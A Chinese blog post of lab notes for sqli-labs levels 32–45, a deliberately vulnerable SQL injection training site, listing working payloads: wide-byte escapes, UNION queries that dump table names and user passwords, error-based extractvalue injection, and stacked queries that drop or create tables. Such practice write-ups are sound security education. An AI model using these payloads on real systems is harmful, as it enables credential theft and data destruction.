sqli-labs靶场笔记(六)

最新推荐文章于 2024-07-06 18:29:27 发布
最新推荐文章于 2024-07-06 18:29:27 发布
阅读量210 收藏
点赞数
分类专栏: SQL注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Vi_vids/article/details/111415155
版权

sqli-labs靶场笔记(六)

Less-32【宽字节注入|注释’】

该题使用了自定义函数
下面展示一些 payload

id=1%df'and 1=1 %23	//判断注入类型
id=1%df'order by 3 %23	//查看属性列个数
id=-1%df'union select 1,user(),database() %23	//查看数据库用户、数据库名称
iid=-1%df'union select 1,group_concat(0x7e,table_name),3 from information_schema.tables where table_schema=(select database())%23	//爆破表名
id=-1%df' union select 1,group_concat(0x7e,column_name),3 from information_schema.columns where table_schema=(select database())and table_name=(select table_name from information_schema.tables where table_schema=(select database())limit 3,1) %23	//爆破属性列
id=-1%df' union select 1,2,group_concat(username,0x7e,password) from users %23	//爆破数据

输入单引号检测,发现单引号被转义,符合宽字节注入攻击
在这里插入图片描述
当且仅当数据库的编码为GBK时,可以使用宽字节注入。反斜杠的编码为%5c,而在GBK编码中,%df%5c是一个字,所以单引号成功逃逸
在这里插入图片描述

属性列为3
在这里插入图片描述
在这里插入图片描述
数据库名为security,用为root
在这里插入图片描述
爆破表名为email、referers、uagents、users
在这里插入图片描述
爆破属性列为id、username、password
在这里插入图片描述
最后得到数据库中的数据
在这里插入图片描述

Less-33【宽字节注入|注释’】

该题使用了PHP的addslashes()函数
payload和上题一样
在这里插入图片描述

Less-34【宽字节注入|报错注入|注释’】

该题使用了PHP的addslashes()函数
下面展示 payload

uname=admin&passwd=ers%df'and extractvalue(1,concat(0x7e,(select group_concat(0x7e,table_name) from information_schema.columns where table_schema=(select database()))))%23&submit=Submit

在这里插入图片描述

在burp上,使用各种命令发现无返回
使用报错注入:
在这里插入图片描述
在这里插入图片描述

Less-35【报错注入|注释’|联合注入】

该题使用了PHP的addslashes()函数

法一:【报错注入】

下面展示 payload

id=1 and extractvalue(1,concat(0x7e,(select database())))	//爆破数据库
id=1 and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=(select database()))))	//爆破表

在这里插入图片描述

法二:【联合注入】

下面展示一些 payload'

?id=-1 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479),3	//爆破表名

在这里插入图片描述

Less-36【联合注入|宽字节注入】

该题使用php中的mysql_real_escape_string()函数
下面展示payload

id=-1%df' union select 1,(select  group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479)%23	//爆表

在这里插入图片描述

Less-37【宽字节注入|报错注入】

该题使用php中的mysql_real_escape_string()函数
下面展示 payload

uname=admin&passwd=admin%df%27and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479)))%23&submit=Submit	//爆破表

在这里插入图片描述
在这里插入图片描述

Less-38【堆叠注入|联合注入|'注入】

当使用‘【单引号】是报错,在其后面加多一个;【分号】即没有报错
下面展示 payload

法一:【联合注入】

id=-1' union select 1,(select group_concat(table_name)from information_schema.tables where table_schema='security'),3;	//爆破表

在这里插入图片描述

法二:【堆叠注入】

在这里插入图片描述
在这里插入图片描述

Less-39【联合查询注入|'替换注入|堆叠注入】

替换’【单引号】为 ` ‘

法一:【嵌套】

下面展示一些 payload

id=-1 union select 1,(select group_concat(table_name)from information_schema.tables where table_schema=(select database())),3	//爆破表

在这里插入图片描述

法二:【十六进制】

下面展示 payload

id=-1 union select 1,(select group_concat(table_name)from information_schema.tables where table_schema=0x7365637572697479),3	//爆破表

在这里插入图片描述

数据库方面的堆叠不展示

Less-40【联合注入|堆叠注入|’)注入】

下面展示payload

id=-1') union select 1,(select group_concat(table_name)from information_schema.tables where table_schema=0x7365637572697479),3	//爆破表

在这里插入图片描述

数据库方面的堆叠不展示

Less-41【联合注入|堆叠注入】

法一:【联合注入】

下面展示 payload

id=-1 union select 1,(select group_concat(table_name)from information_schema.tables where table_schema=0x7365637572697479),3	//爆破表

在这里插入图片描述

法二:【堆叠注入】

在这里插入图片描述

Less-42【报错注入|'注入|堆叠注入】

使用order by 语句发现存在错误回显

法一:【报错注入】

下面展示 payload

login_user=admin&login_password=admin'and extractvalue(1,concat(0x7e,(select database()))) %23 &mysubmit=Login	//爆破数据库
login_user=admin&login_password=admin'and extractvalue(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='security'))) %23 &mysubmit=Login	//爆破表

在这里插入图片描述
在这里插入图片描述

法二:【堆叠注入】

下面展示 payload

login_user=admin&login_password=admin';drop table test; &mysubmit=Login	//删表

在这里插入图片描述

Less-43【报错注入|’)注入|堆叠注入】

使用order by 语句发现存在错误回显

法一:【报错注入】

下面展示 payload

login_user=admin&login_password=a') and extractvalue(1,concat(0x7e,(select database())))  #&mysubmit=Login	//爆数据库
login_user=admin&login_password=admin') and extractvalue(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='security'))) %23 &mysubmit=Login	//爆破表

在这里插入图片描述

法二:【堆叠注入】

下面展示 payload

login_user=admin&login_password=admin');create table test like emails %23 &mysubmit=Login	//建表

在这里插入图片描述

Less-44【'注入|堆叠注入】

没有错误回显,尝试使用Boolean盲注、时间盲注均不可以
下面展示 payload

login_user=admin&login_password=admin';drop table test ; %23 &mysubmit=Login	//删表

在这里插入图片描述

Less-45【’)注入|堆叠注入】

没有报错回显,盲注没有成功
下面展示 payload

login_user=admin&login_password=admin');create table test  like emails; %23 &mysubmit=Login	//建表

在这里插入图片描述
在这里插入图片描述

Vi_vids
关注
专栏目录
SQLI-LABS 靶场通过小记(23~38)
曹振国的博客
07-14 837
23~38Less-23:1.加单引号让后面闭合2.使用逻辑运算注入Less-24:Less-25:1.查看源码2.双写搭配大小写匹配关键字绕过3.关键字等价绕过Less-25a:Less-26:1.查看源码发现过滤了,and,or,空格及注释2.通过ascii码转url编码进行绕过Less-26a:Less-27:1.大小写交错绕过2.盲注绕过Less-27a:Less-28:Less-28a:1.同28题使用盲注:2.显错注入(28题也适用):Less-29(网站由世界上最好的防火墙保护):1.查询库名
sqli-labs靶场Less-7
songling515010475的专栏
08-21 347
备注:虽然从首页进来就知道是dump into outfile但我还是假设按不知道的流程来一步步尝试,这样才会印象深刻,不然我觉得失去练习的意义了。 1、访问首页,/Less-7/index.php?id=1,这里的传参点是id 探测五步 判断是否是数字形传参 判断是否有单引号闭合 判断是否是双引号闭合 判断是否单引号+括号闭合 判断是否是双引号+括号闭合 这里我还是按原因来的先探测五步走一遍,结果发现只有两种结果如下: 结果1: 结果2: 分析:这里我尝试不管是怎么样,通过...
Sqlilabs-6
KAKA的博客
07-06 864
第 6 关跟第 5 关一样,只不过是单引号换成了双引号而已 构造 ID 后,显示的内容为:You are in… http://sqlilabs/Less-6/?id=1 回显正常 http://sqlilabs/Less-6/?id=1' 回显正常 http://sqlilabs/Less-6/?id=1" 回显正常 http://sqlilabs/Less-6/?id=1"--+ 回显正常 因为正常时返回的内容为 You are in…无法从返回结果
SQLi-Labs靶场通关笔记(1~21关)
最新发布
trdtyvu的博客
07-06 1678
SQLi-Labs是一个专注于SQL注入的在线靶场,通过模拟真实的Web应用环境,帮助安全爱好者提高SQL注入的防范和应对能力。它一共有65个关卡,其中关卡的类型有但不限于联合查询注入,报错注入,布尔盲注,延时盲注,POST注入,Cookie注入,WAF绕过……可以看出,涵盖的范围还是很广的,对于我们初学注入的人来说很友好。首页可以选择关卡。
sqli-labs(6)
weixin_30685029的博客
05-21 107
双注入GET双引号字符型注入 0x01(这里思路和05一样只是单引号变成了双引号) 首先我们看见这个网站 又是不显示值的 所以想到用报错的信息来得出你想要的结果 有了思路之后来试试一下吧 先填入单引号发现别没有报错 那双引号呐? 这里报错了 证明这里的闭合有“”闭合 那好咯 我们试试昨天的单引号那招 先尝试一下爆破当前数据库名称 http://127.0.0.1/sql1/...
sqlilabs_6
ZERO_zero_0的博客
07-08 212
sqlilabs_6
SQL注入之sqli-labs(
m0_60716947的博客
04-27 456
(一)第二十九关到三十一关 这里只有这三关的笔记是因为这三关比较特殊,所以单独拿出来做笔记。 (1)搭建jsp环境 首先我们先打开29关,进行简单的注入,发现步骤和第一关几乎一模一样,可是这是不可能的,我们先打开网站,看到这关的标题为:被世界上最好的waf防护着。也可以证实这关并不是这样的。其实这关实在jsp环境下以来运行的。 我们首先打开sqli-labs的根目录,在目录最下方发现一个压缩包 就是这关tomcat-files,我们将他提取出来 这里面才是真正的第二十九关,然后.
sqli-labs靶场练习笔记
11-09
### SQLi-Labs靶场练习笔记知识点概览 #### 一、SQL注入基本概念与原理 - **定义**:SQL注入是一种常见的应用层攻击方式,它利用编程中的漏洞,通过在应用程序的输入框中插入恶意SQL语句来控制后端数据库服务器。 -...
sqli-lib64关闯关笔记学习资料.zip
08-22
sqli-labs-1-65閫氬叧鏁欑▼share(by sm0nk).md》这个文件很可能包含了作者sm0nk在完成sqli-lib64所有65关的过程中所记录的笔记和技巧。通过阅读这份文档,你可以了解到每个关卡的关键思路、解题方法以及可能遇到...
Sqli - labs实战笔记
浪子燕青的博客
02-25 502
Sqli - labs 安装与lesson1-4实战 所需环境: 1. PHP 2. MYSQL 3. Apache/Nginx 以上三项Debian都自带了,2与3直接开启即可,但是有几点要注意: 1. Debian下的MySql每次登录的时候默认需要授权,即必须使用sudo,可以修改配置文件忽略默认授权,修改方法在之前的文件有提起过. 2. Apache存放文件放在/var/www/html/目录下 3. sqli-labs 使用的PHP5编写的,但是Debian默认安装PHP7,兼..
sqli-labs靶场练习笔记13-18
m0_47693317的博客
05-24 148
sqli-labs13-18Less-13:POST-Double Injection-Single quotes-String-with twist(基于POST的变形单引号字符型双注入)Less-14:POST-Double Injection-Single quotes-String-with twist(基于POST的变形单引号(双引号)字符型注入)Less-15:POST-Blind-Boolian/time Based-Single quotes(基于POST的单引号布尔/时间盲注)Less-1
sqli-labs靶场笔记
qq_33441500的博客
10-20 228
less-1 单引号的显错注入 关键代码段 直接输入单引号让其报错 由代码我们可以看出数据库查询语句只是对id传参进行了...
Sqli-Labs之less-6
ISNS的博客
02-09 711
说在开头:文章是我通过查询资料后按照自己的理解总结出来的,所以如果有说法不对的地方,欢迎大佬指正~ 我们可以看到less-6的题目提示: 得知这道题是“双注入-双引号-字符型”。 所以,这道题的除了判断注入点时是【"–+】以外,其余的解题步骤和less-5是一模一样的! 完整过程详见: Sqli-Labs之less-5(双注入解法) 最后的结果是: ...
sqli-labs通关攻略教程(less26~less28a)
m0_55854679的博客
07-21 844
less 26 方法1 由题目可知,本题绕过了空格和注释,注释符用|| '1'='1或者;%00绕过。 空白符绕过 (1)mysql空白符:%09、%0A、%0B、%0D、%20、%0C、%A0、/*xxx*/ (2)正则空白符:%09、%0A、%0B、%0D、%20 25%为百分号,%25A0就是空白符 绕开空格 %09——TAB键(水平) %0a——新建一行 %0c——新的一页 %0d return 功能 %0b——TAB键(垂直) %a0——空格 由源码可知,题目还将and、or等下列
sqli-labs————less6
Fly_鹏程万里
05-09 569
Less 6源码:主要代码:$id = '"'.$id.'"'; $sql="SELECT * FROM users WHERE id=$id LIMIT 0,1"; $result=mysql_query($sql);从以上代码中可以中看看,这里我们可以将“‘  ”替换为“ "  ”,之后的语句正常构造就好:这里简单演示一个猜解数据库版本信息的:猜解数据库的第一个字符:之后的内容与之前在less...
SQLI-LABS 靶场通关小记(1~22)
曹振国的博客
07-14 3774
1~22Less-1:1.查询字段数2.查询输出点3.查询库名4.查询表名5.查询字段名6.查询数据Less-2:1.查询输出点Less-3:1.查询输出点Less-4:1.查询输出点Less -5:1.使用left()函数进行截取测试2.使用length判断长度3.利用ascii码猜测数据库名4.使用二分法进行盲注查表名Less-6:1.使用length判断长度Less-7:1.查看源码2.写入一句话木马连接蚁剑Less-8:1.使用length判断长度Less-9:1.使用sleep()函数进行时间盲注
Sqli-labs 靶场通关学习记录
eyyer的博客
02-13 1355
Sqli-labs 靶场通关学习记录
SQL注入从入门到进阶:sqli-labs靶场通关笔记
tzyyyyyy的博客
09-26 6977
SQL注入从入门到进阶:sqli-labs全关通关笔记 Less-1~Less64
sqli-labs靶场1-12关通关记录
SEV__en的博客
07-25 1734
攻击者通过注入SQL语句片段导致后端执行预期外的SQL查询。
SQLi-Labs靶场安装教程:PHPStudy与MySQL配置
"sqli-labs-master靶场安装下载" 本文将详细介绍如何在本地环境中安装和配置sqli-labs靶场,该靶场用于学习和实践SQL注入攻击的防御技巧。sqli-labs是一个非常实用的在线安全训练平台,适合初学者熟悉SQL注入漏洞的...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值